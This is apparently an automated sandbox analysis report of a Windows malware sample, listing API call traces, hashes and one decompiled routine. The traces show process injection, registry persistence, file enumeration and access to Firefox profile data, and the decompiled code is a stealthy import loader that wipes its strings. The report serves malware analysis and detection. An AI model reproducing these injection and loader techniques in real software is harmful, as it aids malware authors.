                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 00375DC6: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00375DEF
                        • Part of subcall function 00375DC6: memcpy.NTDLL(00000000,?,?), ref: 00375E02
                        • Part of subcall function 00375DC6: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375E13
                        • Part of subcall function 00375DC6: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375E28
                        • Part of subcall function 00375DC6: HeapFree.KERNEL32(00000000,00000000,?), ref: 00375E60
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$AllocateFree$CriticalSectionwsprintf$CallEnterErrorExchangeInterlockedLastLeaveLocalNamedPipeTimelstrlen
                      • String ID: u9$u9
                      • API String ID: 899936155-9469851
                      • Opcode ID: 7a4997a7897a2fbf5d76c26e99df6c752df0adcef75fa5bcb2b92fea0454dad7
                      • Instruction ID: ded60f3645c445b4cdbf777c1cbb4dd3de80a7136eae4799ee704383e508292a
                      • Opcode Fuzzy Hash: 7a4997a7897a2fbf5d76c26e99df6c752df0adcef75fa5bcb2b92fea0454dad7
                      • Instruction Fuzzy Hash: C6517E75A00209EFDF22DFA5DC85BAEBBB9EB04344F04846AF805E7251D779D950CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00379EE0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                      • memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379DC4: memcpy.NTDLL(00000000,00379FA5,00000000,?,?,?,00379FA5,00000000,?,?,8B50F445,0037AE2C), ref: 00379E02
                        • Part of subcall function 00379DC4: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379E88
                        • Part of subcall function 00379DC4: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C), ref: 00379EBF
                        • Part of subcall function 00379DC4: LocalFree.KERNEL32(0037AE2C,?,?,?,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?), ref: 00379ECD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                      • memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$Heap$AllocateFree$Local
                      • String ID: Hp9$W
                      • API String ID: 974195196-3938697191
                      • Opcode ID: d68865dc9fcd1dc34f7c5d5edd4bfba6ae436d4b16255b552a8cacf0e2991911
                      • Instruction ID: 6154a857120143b679915e44f59f8bee0f5368b2ceeed2a744b6e5a7e48cc7c6
                      • Opcode Fuzzy Hash: d68865dc9fcd1dc34f7c5d5edd4bfba6ae436d4b16255b552a8cacf0e2991911
                      • Instruction Fuzzy Hash: 11416DB1800209EFDF22DF64CC84AAE7BB9FF48344F14846AF908A7210E7359A549F51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038D5E3, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 0038D605
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                        • Part of subcall function 003894A2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 003894CF
                        • Part of subcall function 003894A2: SetLastError.KERNEL32(00000000,?,0038D667,00000000,?,00010007,00000004,?), ref: 003894D6
                      • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 0038D69C
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0038D6AA
                      • SuspendThread.KERNEL32(?), ref: 0038D6C2
                        • Part of subcall function 00389481: RtlNtStatusToDosError.NTDLL(00000000), ref: 00389499
                        • Part of subcall function 0038D484: memset.NTDLL ref: 0038D4B2
                        • Part of subcall function 0038D484: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0038D53C
                        • Part of subcall function 0038D484: WaitForSingleObject.KERNEL32(00000064), ref: 0038D54A
                        • Part of subcall function 0038D484: SuspendThread.KERNEL32(?), ref: 0038D55D
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 0038D737
                      • ResumeThread.KERNEL32(?), ref: 0038D748
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusmemcpymemset$CloseHandleLastObjectProcessSingleSuspendWait$OpenSectionUnmapViewWow64
                      • String ID: d
                      • API String ID: 1919866759-2564639436
                      • Opcode ID: 7e6907a4e396c4b58b1c84b30afb0f10c4dbaf921e6025148bc0c22f487b45c5
                      • Instruction ID: 085bc1ea71c638eb1b69d710f09f8108da2c79785b6be75f70d3182163ccc53f
                      • Opcode Fuzzy Hash: 7e6907a4e396c4b58b1c84b30afb0f10c4dbaf921e6025148bc0c22f487b45c5
                      • Instruction Fuzzy Hash: 30419C71008305ABCB23FF20DC45A5EBBE8BF84354F0409AAF999961A0D731DD58CBA2
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373B4C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107registryfilememoryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00373B60
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                        • Part of subcall function 00389B2D: lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                        • Part of subcall function 00389B2D: lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                        • Part of subcall function 00389B2D: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                        • Part of subcall function 003897B0: lstrlenW.KERNEL32(?,00000000,0039CCC8,?,?,?,00371788,00000000,?,003717F7,?,?,?,?,00000000), ref: 003897BC
                        • Part of subcall function 003897B0: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,00371788,00000000,?,003717F7,?,?,?,?,00000000), ref: 003897E4
                        • Part of subcall function 003897B0: memset.NTDLL ref: 003897F6
                        • Part of subcall function 00372A11: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00372A11: lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                        • Part of subcall function 00372A11: lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                        • Part of subcall function 00372A11: RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00373C47
                      • GetLastError.KERNEL32 ref: 00373C52
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00373C67
                      • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00373C78
                        • Part of subcall function 00372AD3: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00372AD3: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                        • Part of subcall function 00372AD3: lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                        • Part of subcall function 00372AD3: HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$Heap$Close$AllocateCreateFreeOpen$DirectoryErrorFileLastlstrcmpimemcpymemset
                      • String ID: .dll$.exe
                      • API String ID: 719682790-724907077
                      • Opcode ID: 90c705c47436e6a09f5657cfc82a1491957e58f4b2ea7220034046f8dbd8fa83
                      • Instruction ID: b1f2538a55b1d1aa325e784a1eecac8a1250e80cb00d7c909d829362525574fe
                      • Opcode Fuzzy Hash: 90c705c47436e6a09f5657cfc82a1491957e58f4b2ea7220034046f8dbd8fa83
                      • Instruction Fuzzy Hash: 72317E7290021AFBDB23ABA5DD4AEAF7B7CEF44740F104056F509F2160DB359A00EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372B4D, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlImageNtHeader.NTDLL(00000094), ref: 00372B6E
                        • Part of subcall function 00372AD3: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00372AD3: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                        • Part of subcall function 00372AD3: lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                        • Part of subcall function 00372AD3: HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      • CloseHandle.KERNEL32(0039D198), ref: 00372BB7
                        • Part of subcall function 00372998: lstrcatW.KERNEL32(?,?), ref: 003729AA
                        • Part of subcall function 00372998: WaitForSingleObject.KERNEL32(00002710,?), ref: 003729CD
                        • Part of subcall function 00372998: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003729EF
                        • Part of subcall function 00372998: GetLastError.KERNEL32(?,00372BDD,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372A03
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372C5E
                        • Part of subcall function 00389B2D: lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                        • Part of subcall function 00389B2D: lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                        • Part of subcall function 00389B2D: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                        • Part of subcall function 00389AE6: HeapFree.KERNEL32(00000000,?,?), ref: 00389B16
                      • HeapFree.KERNEL32(00000000,?,.dll), ref: 00372C6D
                        • Part of subcall function 00372A11: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00372A11: lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                        • Part of subcall function 00372A11: lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                        • Part of subcall function 00372A11: RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freelstrlen$AllocateCloseCreate$DirectoryErrorFileHandleHeaderImageLastObjectOpenSingleWaitlstrcatlstrcmpi
                      • String ID: .dll$.exe$L"7
                      • API String ID: 1002432479-3921587787
                      • Opcode ID: 701c3d8e9572648ce18a6eb5d4373fdfbfbe493598801df4fdb0a15ba2b0b77f
                      • Instruction ID: 2458eab3cdc30f01434eaf51136d9efb99e7f788a3e4f67fbac879b96f58d0bb
                      • Opcode Fuzzy Hash: 701c3d8e9572648ce18a6eb5d4373fdfbfbe493598801df4fdb0a15ba2b0b77f
                      • Instruction Fuzzy Hash: C531D076600609BBDB339BA4DD81BAF77BDEB54780F118026FA099B260EB75CE00C750
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89librarystringloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00401398(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















                      0x00401398
                      0x00401398
                      0x0040139f
                      0x004013a4
                      0x004013ac
                      0x0040148a
                      0x00401492
                      0x00401492
                      0x004013b2
                      0x004013b4
                      0x004013b9
                      0x00000000
                      0x00000000
                      0x004013c1
                      0x004013c1
                      0x004013c5
                      0x004013cb
                      0x004013d1
                      0x00000000
                      0x00000000
                      0x004013e2
                      0x004013e7
                      0x004013e9
                      0x004013ec
                      0x004013f1
                      0x004013f9
                      0x004013f9
                      0x004013fc
                      0x00401400
                      0x00401470
                      0x00401470
                      0x00401473
                      0x00401478
                      0x00000000
                      0x00000000
                      0x00401488
                      0x00000000
                      0x00401489
                      0x00401406
                      0x0040140a
                      0x00000000
                      0x0040140c
                      0x0040140c
                      0x00401414
                      0x00401423
                      0x00401423
                      0x0040140e
                      0x0040140e
                      0x0040140e
                      0x00401425
                      0x00401425
                      0x0040142d
                      0x00401433
                      0x00401439
                      0x00000000
                      0x00000000
                      0x0040143d
                      0x0040144a
                      0x0040144f
                      0x0040144f
                      0x0040145a
                      0x0040145d
                      0x00401460
                      0x00401464
                      0x00000000
                      0x00401466
                      0x00000000
                      0x00401466
                      0x00401468
                      0x00401468
                      0x00000000
                      0x00401468
                      0x004013f3
                      0x004013f7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004013f7
                      0x00401480
                      0x00000000

                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 004013C5
                      • lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                      • memset.NTDLL ref: 004013E2
                      • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                      • lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                      • memset.NTDLL ref: 0040144A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlenmemset$AddressLibraryLoadProc
                      • String ID: ~
                      • API String ID: 1986585659-1707062198
                      • Opcode ID: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction ID: 9cfa27cb60d09a088f87bbc70088036487facf95daeb84733a0c8259cf0c0f36
                      • Opcode Fuzzy Hash: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction Fuzzy Hash: 2E3158716043028BD7149F19DD80B6B77E8AF44388F14043EED81EB3B2E778E8048B6A
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371B89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82memoryfilestringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00371BC8
                      • lstrcpyW.KERNEL32(00000000,00371DC8), ref: 00371BD9
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371BF0
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371C0A
                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00371C3A
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371C48
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                      • String ID: \sols
                      • API String ID: 2686460493-25449109
                      • Opcode ID: 1db0d4f82c1ba6aad9641b49d98d9ae0f6c63f5be72955b7b39148f8bdf43866
                      • Instruction ID: f5c2cc83440edffa023439a1af96f4cb32b75c753470a29ab576f60fc04e8bb6
                      • Opcode Fuzzy Hash: 1db0d4f82c1ba6aad9641b49d98d9ae0f6c63f5be72955b7b39148f8bdf43866
                      • Instruction Fuzzy Hash: F621D133154205BFD3236B68DC85E7FBBACEF85B81F01041BF505922A0DB669C059BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037290A, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00372916
                      • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00372934
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0037293C
                      • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0037295A
                      • GetLastError.KERNEL32 ref: 0037296E
                      • RegCloseKey.ADVAPI32(?), ref: 00372979
                      • CloseHandle.KERNEL32(00000000), ref: 00372980
                      • GetLastError.KERNEL32 ref: 00372988
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                      • String ID:
                      • API String ID: 3822162776-0
                      • Opcode ID: 52e53888fe8cf3c8c90158e1aa361e04c884ce0a3dafed8864db6c4587ef9641
                      • Instruction ID: 1c835b876e4e40102f6e067205f292556060a08591ce0c2b73a54a4c26bfa97d
                      • Opcode Fuzzy Hash: 52e53888fe8cf3c8c90158e1aa361e04c884ce0a3dafed8864db6c4587ef9641
                      • Instruction Fuzzy Hash: 3C116175104209BFDB235FA0DC49FAB3B6DEB44361F158016FE09C62A0DB32C954DB20
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00376E94, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 146registrysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00389AE6: HeapFree.KERNEL32(00000000,?,?), ref: 00389B16
                        • Part of subcall function 00373B4C: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00373B60
                        • Part of subcall function 00373B4C: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00373C47
                        • Part of subcall function 00373B4C: GetLastError.KERNEL32 ref: 00373C52
                        • Part of subcall function 00373B4C: HeapFree.KERNEL32(00000000,00000000), ref: 00373C67
                        • Part of subcall function 00373B4C: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00373C78
                      • SetEvent.KERNEL32 ref: 00376F2A
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00376FB6
                      • RegOpenKeyA.ADVAPI32(80000001,0039E962,?), ref: 00376FE6
                      • RegCloseKey.ADVAPI32(?), ref: 0037700D
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                        • Part of subcall function 0038940B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0038943C
                        • Part of subcall function 0038940B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 00389477
                        • Part of subcall function 00386F0A: CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                        • Part of subcall function 00386F0A: GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 00386F0A: ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                        • Part of subcall function 00386F0A: GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                        • Part of subcall function 00386F0A: CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CloseFind$Error$FreeHeapLastObjectSingleWait$CreateCriticalFirstHandleNextOpenSectionmemset$EnterEventInformationLeavePointerQueryReadSizeStatusSystemWritewcscpy
                      • String ID: %APPDATA%\Mozilla\Firefox\Profiles$9
                      • API String ID: 3074796919-4152207650
                      • Opcode ID: db6c779c0cb17182cf8fb3ac27460dd7b26503753026b5d3de9b9f069fe45957
                      • Instruction ID: 30703f105562d53a39e6208fd869154a8c8e1693a43edd278f0a83424b272a72
                      • Opcode Fuzzy Hash: db6c779c0cb17182cf8fb3ac27460dd7b26503753026b5d3de9b9f069fe45957
                      • Instruction Fuzzy Hash: 1B412371614300AFDB22EF65DC82AAAB7EDFB84754F00882EF588D71A1D775DC048B91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037A045, Relevance: 10.6, APIs: 7, Instructions: 144memoryregistryCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0037A0B8
                      • HeapFree.KERNEL32(00000000,?), ref: 0037A0F9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037A109
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0037AC33,00000000,?,?,?), ref: 0037A199
                        • Part of subcall function 00379EE0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                        • Part of subcall function 00379EE0: RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                        • Part of subcall function 00379EE0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379EE0: HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                        • Part of subcall function 00379EE0: memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037A175
                        • Part of subcall function 0037976C: lstrlen.KERNEL32(?,00397048,00000000), ref: 00379791
                        • Part of subcall function 0037976C: wsprintfA.USER32 ref: 003797D1
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 00379805
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 0037983E
                        • Part of subcall function 0037976C: memcpy.NTDLL(?,0039D4FB,-000000FA), ref: 003798A1
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,?,0039D500), ref: 003798F0
                        • Part of subcall function 0037976C: memcpy.NTDLL(?,?,00000000), ref: 0037990A
